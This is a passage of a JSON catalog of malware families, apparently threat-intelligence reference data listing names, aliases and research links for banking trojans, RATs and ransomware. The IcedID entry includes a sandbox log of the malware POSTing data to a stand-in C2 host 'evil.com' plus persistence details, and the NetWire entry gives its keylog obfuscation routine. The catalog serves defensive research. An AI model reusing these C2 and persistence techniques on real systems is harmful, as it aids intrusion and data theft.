"https://attack.mitre.org/wiki/Technique/T1003"
]
}
},
{
"uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
"value": "nRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/910952333084971008",
"https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
"https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/"
]
}
},
{
"uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
"value": "RedAlert2",
"description": "RedAlert 2 is a new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying the legitimate login screen with a fake display that sends the entered credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim from being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber or WhatsApp, or poses as a fake Adobe Flash Player update.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
"https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
]
}
},
{
"uuid": "080b2071-2d69-4b76-962e-3d0142074bcb",
"value": "Qadars",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
"https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf",
"https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
"https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
"https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
"https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
]
}
},
{
"uuid": "42fa55e3-e708-4c11-b807-f31573639941",
"value": "Retadup",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
]
}
},
{
"uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6",
"value": "Unlock92",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/810753660737073153",
"https://twitter.com/bartblaze/status/976188821078462465"
]
}
},
{
"uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
"value": "Jimmy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
]
}
},
{
"uuid": "f856a7c7-768e-415f-90f8-80a914c77083",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"fysbis",
"splm",
"chopstick"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
"value": "Kronos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
"https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
"https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
"https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
]
}
},
{
"uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
"value": "WebC2-Bolid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "52608ecb-3625-434a-88ef-9806b9b04e61",
"value": "Erebus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/"
]
}
},
{
"uuid": "d95f0171-8c5c-48ff-a22f-a8c20c196819",
"value": "Mirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
"https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
"https://isc.sans.edu/diary/22786",
"https://github.com/jgamblin/Mirai-Source-Code",
"http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/"
]
}
},
{
"uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303",
"value": "PandaBanker",
"description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe base config (C2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the C2, with further information about how to grab the webinjects and additional modules, such as VNC, backsocks and grabber.\r\n\r\nPanda does have a DGA implemented, but according to Arbor, a bug prevents it from using it.",
"meta": {
"synonyms": [
"ZeusPanda"
],
"type": [],
"refs": [
"https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
"https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
"https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market",
"https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
"https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/",
"https://www.spamhaus.org/news/article/771/",
"http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
"https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks",
"https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
"https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
"https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/",
"http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
"https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/"
]
}
},
{
"uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec",
"value": "SmokeLoader",
"description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404, but the response body still contains data.",
"meta": {
"synonyms": [
"Dofoil"
],
"type": [],
"refs": [
"https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/",
"https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
"https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
"https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
"https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
"https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
"https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
"https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
"https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/"
]
}
},
{
"uuid": "07f46d21-a5d4-4359-8873-18e30950df1a",
"value": "Andromeda",
"description": "",
"meta": {
"synonyms": [
"Gamarue",
"B106-Gamarue",
"B67-SS-Gamarue",
"b66"
],
"type": [],
"refs": [
"https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet",
"https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
"https://blog.avast.com/andromeda-under-the-microscope",
"https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
"http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
"http://blog.morphisec.com/andromeda-tactics-analyzed",
"https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
"http://resources.infosecinstitute.com/andromeda-bot-analysis/",
"http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
"https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08",
"https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
"https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
"https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
"https://blog.fortinet.com/2014/04/23/andromeda-2-7-features",
"https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html"
]
}
},
{
"uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2",
"value": "DE Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
"https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users"
]
}
},
{
"uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
"value": "CrashOverride",
"description": "",
"meta": {
"synonyms": [
"Crash",
"Industroyer"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
"https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
]
}
},
{
"uuid": "1ecbcd20-f238-47ef-874b-08ef93266395",
"value": "Dyre",
"description": "",
"meta": {
"synonyms": [
"Dyreza"
],
"type": [],
"refs": [
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
"https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
"https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates"
]
}
},
{
"uuid": "7759534c-3298-42e9-adab-896d7e507f4f",
"value": "MaMi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x26.html"
]
}
},
{
"uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38",
"value": "Xtreme RAT",
"description": "",
"meta": {
"synonyms": [
"ExtRat"
],
"type": [],
"refs": [
"https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
"https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
"https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat",
"https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html"
]
}
},
{
"uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16",
"value": "IcedID Downloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
"https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
]
}
},
{
"uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
"value": "elf.wellmess",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7",
"value": "MalumPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf"
]
}
},
{
"uuid": "721fe429-f240-4fd6-a5c9-187195624b51",
"value": "Banatrix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/banatrix-an-indepth-look/"
]
}
},
{
"uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd",
"value": "UPAS",
"description": "",
"meta": {
"synonyms": [
"Rombrast"
],
"type": [],
"refs": [
"https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
"https://twitter.com/ulexec/status/1005096227741020160",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/"
]
}
},
{
"uuid": "53021414-97ad-4102-9cff-7a0e1997f867",
"value": "Imminent Monitor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
]
}
},
{
"uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
"value": "CryptXXXX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
]
}
},
{
"uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
"value": "LatentBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
"https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
"http://malware-traffic-analysis.net/2017/04/25/index.html",
"https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
"https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/"
]
}
},
{
"uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd",
"value": "PowerDuke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
]
}
},
{
"uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1",
"value": "Rombertik",
"description": "",
"meta": {
"synonyms": [
"CarbonGrabber"
],
"type": [],
"refs": [
"http://blogs.cisco.com/security/talos/rombertik"
]
}
},
{
"uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30",
"value": "MirageFox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
]
}
},
{
"uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
"value": "Tempedreve",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
"value": "IRRat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
]
}
},
{
"uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7",
"value": "Kuaibu",
"description": "",
"meta": {
"synonyms": [
"Barys",
"Gofot",
"Kuaibpy"
],
"type": [],
"refs": []
}
},
{
"uuid": "70cd1eb4-0410-47c6-8817-418380240d85",
"value": "Logedrut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9",
"value": "Jager Decryptor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151",
"value": "BrutPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html"
]
}
},
{
"uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
"value": "Joao",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/"
]
}
},
{
"uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
"value": "EvilGrab",
"description": "",
"meta": {
"synonyms": [
"Vidgrab"
],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf"
]
}
},
{
"uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
"value": "KAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
"value": "GlanceLove",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
"https://www.ci-project.org/blog/2017/3/4/arid-viper",
"https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
"https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
"https://www.clearskysec.com/glancelove/"
]
}
},
{
"uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740",
"value": "NetWire RC",
"description": "Netwire is a RAT; its functionality seems focused on password stealing and keylogging, but it includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n",
"meta": {
"synonyms": [
"Recam"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
"https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
"http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
"https://www.circl.lu/pub/tr-23/"
]
}
},
{
"uuid": "d77eacf7-090f-4cf6-a305-79a372241158",
"value": "GetMyPass",
"description": "",
"meta": {
"synonyms": [
"getmypos"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
"https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
"https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware"
]
}
},
{
"uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248",
"value": "Bella",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/kai5263499/Bella",
"https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/"
]
}
},
{
"uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376",
"value": "jRAT",
"description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It supports macOS, Linux, Windows and various BSDs. It also has functionality to participate in DDoS attacks as well as to perform click fraud. Note that the Adwind family is often mistakenly labeled as jRAT because of a red herring reference to jrat.io.",
"meta": {
"synonyms": [
"Jacksbot"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
"https://github.com/java-rat",
"https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
]
}
},
{
"uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371",
"value": "Solarbot",
"description": "",
"meta": {
"synonyms": [
"Napolar"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
"https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/"
]
}
},
{
"uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8",
"value": "CoinThief",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
]
}
},
{
"uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f",
"value": "VM Zeus",
"description": "",
"meta": {
"synonyms": [
"VMzeus",
"ZeusVM",
"Zberp"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
"https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf"
]
}
},
{
"uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec",
"value": "SocksBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
]
}
},
{
"uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
"value": "Emdivi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
"http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
"https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/"
]
}
},
{
"uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
"value": "Satan Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
"https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
"https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
]
}
},
{
"uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
"value": "Microcin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
"https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf"
]
}
},
{
"uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410",
"value": "Tapaoux",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf"
]
}
},
{
"uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
"value": "MysteryBot",
"description": "MysteryBot is an Android banking Trojan with overlay capabilities and support for Android 7/8; it also provides other features such as key logging and ransomware functionality.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
]
}
},
{
"uuid": "9481d7b1-307c-4504-9333-21720b85317b",
"value": "Cohhoc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf"
]
}
},
{
"uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789",
"value": "FakeDGA",
"description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instructions.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows API).",
"meta": {
"synonyms": [
"WillExec"
],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
"https://github.com/360netlab/DGA/issues/36",
"http://www.freebuf.com/column/153424.html"
]
}
},
{
"uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330",
"value": "IcedID",
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: 
<(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"meta": {
"synonyms": [
"BokBot"
],
"type": [],
"refs": [
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
"https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
"https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid"
]
}
},
{
"uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2",
"value": "TreasureHunter",
"description": "",
"meta": {
"synonyms": [
"huntpos"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
"https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
"http://adelmas.com/blog/treasurehunter.php"
]
}
},
{
"uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b",
"value": "AlmaLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
